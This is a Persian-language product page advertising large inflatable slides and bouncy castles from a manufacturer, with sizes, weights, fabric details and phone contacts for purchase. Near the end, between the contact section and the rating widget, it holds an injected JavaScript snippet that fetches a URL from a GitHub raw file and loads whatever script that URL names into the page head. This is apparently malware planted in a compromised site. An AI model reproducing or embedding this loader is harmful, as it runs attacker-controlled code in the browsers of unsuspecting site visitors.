سرسره بادی های بزرگ بادی سازان مجد

سرسره بادی های بزرگ بادی سازان مجد

  • سرسره بادی های بزرگ این دستگاه فقط در شهر بازی ها و پارک های فضای بزرگ دارند قابل استفاده می باشد. این سرسره ها از شاهکار های تولیدی بادی سازان مجد می باشد

    سرسره بادی قلعه

    قصر بادی قلعه یک قصر بادی بزرگ که جزو بزرگ ترین دستگاه های مجدسازه است. این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد. ابعاد اندازه طول 10 متر و عرض آن 6.5 متر و ارتفاع این سرسره بادی به 8.5 متر می رسد که در فضاهایی باز استفاده می شود. همچنین جهت حمل نقل باید بدانید وزن کلی این سرسره 350 کیلوگرم می باشد. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا استفاده می شود. برای اطلاعات بیشتر به این پست مراجعه فرمایید.

    سرسره بادی نخلی

    قصر بادی نخلی یک قصر بادی دو سر بزرگ که جزو بزرگ ترین دستگاه های مجدسازه است. این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد. ابعاد اندازه طول 10 متر و عرض آن 7 متر و ارتفاع این سرسره بادی به 8.5 متر می رسد که در فضاهایی باز استفاده می شود. همچنین جهت حمل نقل باید بدانید وزن کلی این سرسره 400 کیلوگرم می باشد. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا استفاده می شود. برای اطلاعات بیشتر به این پست مراجعه فرمایید.

    سرسره پاندا کنگوفو کار

    قلعه بادی طرح پاندا کنگوفوکار یک قصر بادی دو سر بزرگ که جزو بزرگ ترین دستگاه های مجدسازه است. این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد. ابعاد اندازه طول 9 متر و عرض آن 7 متر و ارتفاع این سرسره بادی به 7 متر می رسد که در فضاهایی باز استفاده می شود. همچنین جهت حمل نقل باید بدانید وزن کلی این سرسره 400 کیلوگرم می باشد. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا استفاده می شود. برای اطلاعات بیشتر به این پست مراجعه فرمایید.

    سرسره پاندا کنگوفوکار تک سُر

    قصر بادی پاندا کنگوفوکار یک قصر بادی بزرگ که جزو بزرگ ترین دستگاه های مجدسازه است. این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد. ابعاد اندازه طول 9 متر و عرض آن 6.5 متر و ارتفاع این سرسره بادی به 7.5 متر می رسد که در فضاهایی باز استفاده می شود. همچنین جهت حمل نقل باید بدانید وزن کلی این سرسره 280 کیلوگرم می باشد. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا استفاده می شود. برای اطلاعات بیشتر به این پست مراجعه فرمایید.

    نحوه خرید

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این دستگاه ها می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید